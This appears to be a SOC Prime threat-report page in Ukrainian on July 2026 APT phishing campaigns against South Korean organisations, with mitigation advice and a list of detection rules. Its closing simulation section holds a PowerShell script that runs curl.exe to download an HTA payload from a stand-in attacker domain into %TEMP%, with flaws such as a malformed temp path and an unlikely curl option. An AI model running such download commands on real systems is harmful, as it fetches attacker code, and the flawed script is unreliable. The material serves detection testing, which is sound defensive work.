SOC Prime Bias: Critical

31 Aug 2026 06:13 UTC

Звіт про загрози APT з Південної Кореї: Тенденції липня 2026 року

Author Photo
SOC Prime Team linkedin icon Стежити
Звіт про загрози APT з Південної Кореї: Тенденції липня 2026 року
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

AhnLab повідомляє про зростання активності APT, націленої на організації Південної Кореї через кампанії фішингу. Атаки в першу чергу спираються на зловмисні файли LNK для доставки завантажуваного коду, що включає PowerShell скрипти, AutoIt скрипти та бекдори. Загальні техніки включають забезпечення стійкості через Планувальник завдань та ексфільтрацію даних через сервіси такі, як Dropbox та PubNub.

Розслідування

Розслідування зосередилося на інфраструктурі APT, що використовувалася проти південнокорейських організацій впродовж липня 2026 року. Аналітики згрупували активність у кілька типів атак, від A до G, на основі методів доставки та функціональних характеристик. Дослідники також ідентифікували поведінки, включаючи підстановку DLL та зловживання вбудованими утилітами Windows, такими, як curl.exe для отримання завантажуваного коду.

Мітигація

Користувачі повинні перевіряти ідентичності відправників і уникати відкривання вкладень, отриманих від невідомих або недовірених джерел. Організаціям слід оновлювати операційні системи і веб-браузери останніми патчами безпеки. Також рекомендується підтримувати актуальними антивірусні та рішення для захисту кінцевих точок, такі як V3.

Реагування

Якщо виявлено підозрілі файли LNK або несанкціоновані записи в Планувальнику завдань, відповідальні за інциденти повинні негайно ізолювати уражений хост. Проводьте аналіз пам’яті для виявлення ін’єкційних бекдорів або зловмисних DLL-файлів. Журнали мережі також слід переглядати на предмет незвичайної вихідної активності до файлообмінних сервісів або каналів управління та контролю, таких як PubNub.

Потік Атаки

Ми все ще оновлюємо цю частину.

Виявлення

Підозріла поведінка ухилення від захисту LOLBAS MSHTA через виявлення пов’язаних команд (via process_creation)

Команда SOC Prime
28 серпня 2026

Підозріле використання CURL (via cmdline)

Команда SOC Prime
28 серпня 2026

Підозріле заплановане завдання (via audit)

Команда SOC Prime
28 серпня 2026

Можлива інфільтрація/ексфільтрація даних/с2 через сторонні сервіси/інструменти (via proxy)

Команда SOC Prime
28 серпня 2026

Можлива інфільтрація/ексфільтрація даних/с2 через сторонні сервіси/інструменти (via dns)

Команда SOC Prime
28 серпня 2026

IOC (HashMd5) для виявлення: Звіт про загрозу APT атак (Південна Корея) за липень 2026 року

Правила AI SOC Prime
28 серпня 2026

Curl.Exe використовується для завантаження та виконання зловмисних файлів [Windows Sysmon]

Правила AI SOC Prime
28 серпня 2026

Виявлення зловмисних PowerShell команд у файлах LNK [Windows Powershell]

Правила AI SOC Prime
28 серпня 2026

Симуляція Виконання

Передумова: Перевірка телеметрії та базового рівня має бути пройдена.

Мотивація: Цей розділ деталізує точне виконання техніки противника (TTP), розроблене для спрацювання правила виявлення. Команди та виклад повинні безпосередньо відображати ідентифіковані TTP і націлюватися на генерацію саме тієї телеметрії, яка очікується у логіці виявлення. Абстрактні або не пов’язані приклади можуть привести до неправильної діагностики.

  • Сценарій атаки та команди: Противник має намір використати curl.exe для завантаження зловмисного HTA файлу в %TEMP% каталог для закріплення позиції. Щоб перевірити, чи працює поточна логіка виявлення (оскільки вона спеціально шукає слова “download” або “execute”), зловмисник використає командний рядок, що явно містить ці слова в якості частини фальшивого аргументу або опису, імітуючи слабко сконструйований скрипт або конкретну спробу імітувати шаблон, який SOC шукає.

  • Скрипт тестування регресії:

     # Імітуємо зловмисника, використовуючи curl із конкретними ключовими словами, потрібними для правила
      $tempPath = $env:TEMPmalicious.hta
      $url = "http://attacker-controlled-domain.com/payload.hta"
    
      # Ця команда спеціально розроблена для спрацювання 'contains' логіки правила
      # уключаючи слова 'download' і 'execute' в рядок команд.
      Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'"
  • Команди очищення:

     # Видалити фіктивний файл, створений під час симуляції
      if (Test-Path "$env:TEMPmalicious.hta") {
          Remove-Item -Path "$env:TEMPmalicious.hta" -Force
      }